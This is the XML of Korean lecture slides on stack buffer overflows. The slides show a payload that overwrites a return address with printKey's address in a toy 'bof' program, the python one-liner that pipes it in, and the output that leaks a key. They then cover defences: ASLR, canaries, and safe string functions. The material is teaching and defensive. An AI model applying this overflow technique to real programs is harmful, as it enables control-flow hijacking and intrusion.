              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 0x804858f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>0x804858f: "%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" alt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86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6.25E-7 0.0460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4606 L 6.25E-7 0.3187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31875 L 6.25E-7 0.3666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36667 L 0.00039 0.4138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41389 L 0.00039 0.511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51134 L 0.00039 0.55555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9" grpId="0" animBg="1"/>
      <p:bldP spid="11" grpId="0" animBg="1"/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49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2131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공격 코드 작성법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C2C4F-43E1-4263-BEA5-DCCA98E40D5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5036755" y="4487804"/>
            <a:ext cx="6230557" cy="29932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AAAAAAAAAAAAAA\x08\x04\x84\x8b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12F75F-BED7-4379-BC71-438E76F0FE36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446067" y="976950"/>
            <a:ext cx="2414726" cy="558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171E00-1D5B-4BE1-955D-C82D0B8ADE11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365760" y="6480047"/>
            <a:ext cx="2575340" cy="14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838F5B-8B61-4B9D-B54E-851C4012B9B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446067" y="976950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CA8F3-989C-4965-9777-BEB8D6818D7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446067" y="3815582"/>
            <a:ext cx="2414726" cy="65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0x080484c6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2C630E-5CF2-42FE-92C5-CC0CFD79A3F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446067" y="4471606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7E5CF-7BC0-4F8F-B012-82FB0806B6A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446067" y="4786985"/>
            <a:ext cx="2414726" cy="140493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버퍼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22BD3D-0C10-44AD-A948-8A8324CACDB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446067" y="2397587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727C56-EC80-4F3C-B047-451A2B40C2E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446067" y="2663834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C18AD-988E-4CB6-AF1A-2DB6886554F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446067" y="2930255"/>
            <a:ext cx="2414726" cy="232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5CCEDA-7FCD-4F24-8260-C12A54354852}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446067" y="3174847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주소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ACFB12-3143-4F32-B7B3-F79792015421}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446067" y="3498818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“%s”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BFEB36-9B28-45F0-B80A-7569BF3A1637}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5678951" y="2294502"/>
            <a:ext cx="48682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err="1"/>
              <a:t>printKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>의 주소</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> :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0x0804848b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1CB1E2-52DB-4AC5-A85A-16D852860C4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="816035" y="165374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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>의 공간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2DCF24F-2061-4B3C-BA49-8F2B35233C64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7153894" y="4124049"/>
            <a:ext cx="0" cy="266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1BAFF2-8756-4B52-BEC0-6F5BA5385F51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6792256" y="3785495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1byte</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600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F740E3EF-FB88-4448-BCCB-B26EDAFC0D92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="8021971" y="4089823"/>
            <a:ext cx="266247" cy="44661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A87F47-1B0F-45C4-8C95-C354A4F60C5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7792512" y="3785495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1byte</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="160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9A07D7BF-62D3-4C4A-86EA-6DEB11DD4738}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2860793" y="5218865"/>
            <a:ext cx="1055547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X10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AE53F56F-6B81-4FA1-BC15-F916B2D3B73B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2860793" y="4367010"/>
            <a:ext cx="1055547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X 4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B6B7AD0F-5A02-468A-BA5F-3B668ED53657}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2860792" y="3777911"/>
            <a:ext cx="1382434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0804848b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02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CC352-C659-4DB1-8601-A2695EEED952}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3441843" y="274319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Big endain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ECD91-D5E6-4BEC-8E81-3FC7FB1AA6FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3441843" y="442816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Little endain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7E908-91D0-43F4-9D87-FA4360B71CD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1777429" y="3645026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Byte order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40AE07-0CFB-40F5-B076-B22357B199D2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3062461" y="2927865"/>
            <a:ext cx="379382" cy="901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8082A6-73B7-434E-B09D-AD870C5CA65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062461" y="3829692"/>
            <a:ext cx="379382" cy="783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EF312F-F505-428A-9094-122B5A0AD051}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5356455" y="2604160"/>
            <a:ext cx="306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바이트 순서가 낮은 메모리 주소에서 높은 메모리 주소로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F78F5-D203-424B-8005-B5A30B317B30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5356455" y="4289661"/>
            <a:ext cx="295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바이트 순서가 높은 메모리 주소에서 낮은 메모리 주소로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4BC9CD-4636-4934-84CC-B15E28E849E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5116530" y="2742660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581E47-F8C5-49D7-B3B5-F7FBB9DD5CF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5116530" y="4428161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CD2E58-C6CB-48EB-974A-5F9BAF226D6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8315411" y="274265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12345678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C08AB-CF4C-4263-A5F9-1681F9C34050}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8315411" y="44276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78563412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7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74B32B-71BD-4BF3-A777-58BC9C158E1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4997774" y="4487936"/>
            <a:ext cx="6230557" cy="29932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AAAAAAAAAAAAAA\x8b\x84\x04\x08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40F742-2FA2-49A8-9889-69AB7FD93A1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446067" y="976950"/>
            <a:ext cx="2414726" cy="558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D7789-E9EE-4EC5-B92D-09761A331F48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365760" y="6480047"/>
            <a:ext cx="2575340" cy="14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F22EB-3A38-4E26-84D0-3B5B978E2372}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446067" y="976950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DD707C-8FC4-457D-AE8F-B41954905877}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446067" y="3815582"/>
            <a:ext cx="2414726" cy="65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0x080484c6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DDA6D7-9159-4D16-8BDE-E92301C5F064}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446067" y="4471606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77D44-85C5-443E-B4ED-B2285E04628F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446067" y="4786985"/>
            <a:ext cx="2414726" cy="140493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버퍼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C788EB-4AE7-4127-9DE9-2A3448FA3F11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446067" y="2397587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522ED-B6F7-4EA1-8383-D0172468A739}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446067" y="2663834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FAD12C-CE93-4F72-B1F4-C5539EE50396}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446067" y="2930255"/>
            <a:ext cx="2414726" cy="232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9D331-204C-41C8-A5C5-28719E5F6C2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446067" y="3174847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주소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0C977-07DF-4C45-AB27-C7B40B85A44F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446067" y="3498818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“%s”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C692D-41DD-41A7-8F4F-D345BBD7B069}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="816035" y="165374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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>의 공간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28A282C-822D-43C4-A9B7-2FD0DC16A664}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2860793" y="5218865"/>
            <a:ext cx="1055547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X10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67A96A9-DC52-4559-8A3C-72F0310DD696}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2860793" y="4367010"/>
            <a:ext cx="1055547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X 4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A308A8F-98AF-4E15-9378-93B2AAECD27E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2860792" y="3777911"/>
            <a:ext cx="1382434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8b840408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B968EB-BCE5-49CC-AA8D-819C9326D2E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5678951" y="2294502"/>
            <a:ext cx="48682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err="1"/>
              <a:t>printKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>의 주소</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> :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0x0804848b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0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72DC80-116B-49D3-B979-91824D6AA271}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4997774" y="4591779"/>
            <a:ext cx="6230557" cy="29932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python -c "print 'A'*14 + '\x8b\x84\x04\x08'" | ./</a:t>
            </a:r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84788B-D987-4151-9614-59529DD56701}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446067" y="976950"/>
            <a:ext cx="2414726" cy="5585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800D4A-14E6-4A15-A48D-28EABF3E0AB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365760" y="6480047"/>
            <a:ext cx="2575340" cy="14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7CC2B-B7A0-4EA4-B8A5-D6C3B332BAC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446067" y="976950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D9DB26-DDAE-403D-A71C-60D3E8F42D71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446067" y="3815582"/>
            <a:ext cx="2414726" cy="65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0x080484c6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5C092-A6D3-44A0-9FEB-18640063008C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446067" y="4471606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C0F19D-0976-4743-890B-89A75C0FB607}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446067" y="4786985"/>
            <a:ext cx="2414726" cy="140493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버퍼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CA2B88-7092-4100-98E9-8B1BFFF4C91E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446067" y="2397587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6ADFDE-05E9-47AF-ABE4-CAE723594F44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446067" y="2663834"/>
            <a:ext cx="2414726" cy="258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3E949-CAE3-41B1-A7C5-7F2DD0C0704F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446067" y="2930255"/>
            <a:ext cx="2414726" cy="232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437B43-9F4C-48AE-B78C-6B3031AC84D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446067" y="3174847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주소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4EC5F-E656-4BE2-A9B5-D028B9947967}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446067" y="3498818"/>
            <a:ext cx="2414726" cy="31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“%s”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E944E-4118-4E65-9ED4-09F18329B111}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="816035" y="165374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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>의 공간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502A745-F81C-4043-B095-8D4C86B77D52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2860793" y="5218865"/>
            <a:ext cx="1055547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X10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A17393F-815D-446F-A21A-BEFDCE7CF461}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2860793" y="4367010"/>
            <a:ext cx="1055547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X 4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290CFB4-C10B-4671-B188-F604CC2B0445}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2860792" y="3777911"/>
            <a:ext cx="1382434" cy="5411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8b840408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4B150-8753-4FC5-BDAD-4147B1267A11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5678951" y="2294502"/>
            <a:ext cx="48682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err="1"/>
              <a:t>printKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>의 주소</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> :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0x0804848b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1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D8A8819F-6F74-4F7E-8BD6-B64C83C6CC0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365760" y="229970"/>
            <a:ext cx="2131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공격 코드 작성법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D27132-A093-4097-98E5-CABF5321CA72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1258228" y="2953279"/>
            <a:ext cx="9675543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err="1"/>
              <a:t>his@his-VirtualBox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>:~/바탕화면$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> -c "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>'*14 + '\x8b\x84\x04\x08'" | ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>bof</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>Wrong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> : du^82i!&lt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>세그멘테이션</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 오류 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>core</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>dumped</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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2BF53-6D3F-46DD-A33F-331CE1AA0EA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4939272" y="423746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공격 코드 삽입 결과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4A8C1-2214-4153-A069-30A72B1DB37A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1280530" y="3546088"/>
            <a:ext cx="1730299" cy="278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49015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spc="-144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대처 방안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40927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Linux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환경에서의 메모리 보호 기법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3280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코드 작성 시 보호 기법</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3856288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636057-E276-4125-9CB1-B8FEBC10B810}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="999527" y="1706612"/>
            <a:ext cx="10192946" cy="126072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메모리상의 공격을 어렵게 하기 위해 스택이나 힙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 등의 주소를 랜덤으로 </a:t>
            </a:r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로세스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주소 공간에 배치함으로써 실행할 때 마다 주소가 바뀌게 하는 기법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42376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Linux </a:t>
            </a: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환경에서의 메모리 보호 기법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87EFCA-232B-4CB1-A5EB-2708D72454D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1137178" y="1475780"/>
            <a:ext cx="49818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ASLR(Address Space Layout Randomization)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DAD853-1B1C-482C-8FA0-084C88ACAD26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="999527" y="3642461"/>
            <a:ext cx="10192946" cy="233600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진입시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스택에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저장할 때 이 정보들이 공격자에 의해 덮어씌워지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것으로부터 보호하기 위해 </a:t>
            </a:r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스택상의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변수들의 공간과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특정한 값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추가하는데 이 값을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Canary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한다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공격자가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address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변조하려고 시도하면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Canary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덮어씌워지게 된다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프로그램이 종료될 때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canary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원본 값을 비교하여 그 값이 다르면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공격을 받았</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/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다고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판단하여 프로그램을 강제 </a:t>
            </a:r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종료시킨다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6F47B-9AD5-457E-BAA7-2C33BCDEC7FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1137178" y="3411629"/>
            <a:ext cx="181586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Canary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2669282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27704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코드 작성 시 보호 기법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AF9CE2-F469-4344-9BCD-3F3451E8F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81329"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="503957" y="1998983"/>
          <a:ext cx="3691322" cy="29976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5661">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="658303317"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1845661">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3665128606"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="423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취약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대체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600247"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="64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scanf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scanf_s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90974"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="64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strcpy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strcpy_s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71106"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="64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gets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gets_s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74665"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="64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strcat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strcat_s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348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453ED1-BC03-4C94-AA69-DA8F4F4D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74818"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5120095" y="1238293"/>
          <a:ext cx="6567948" cy="47790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6451">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="658303317"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4601497">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
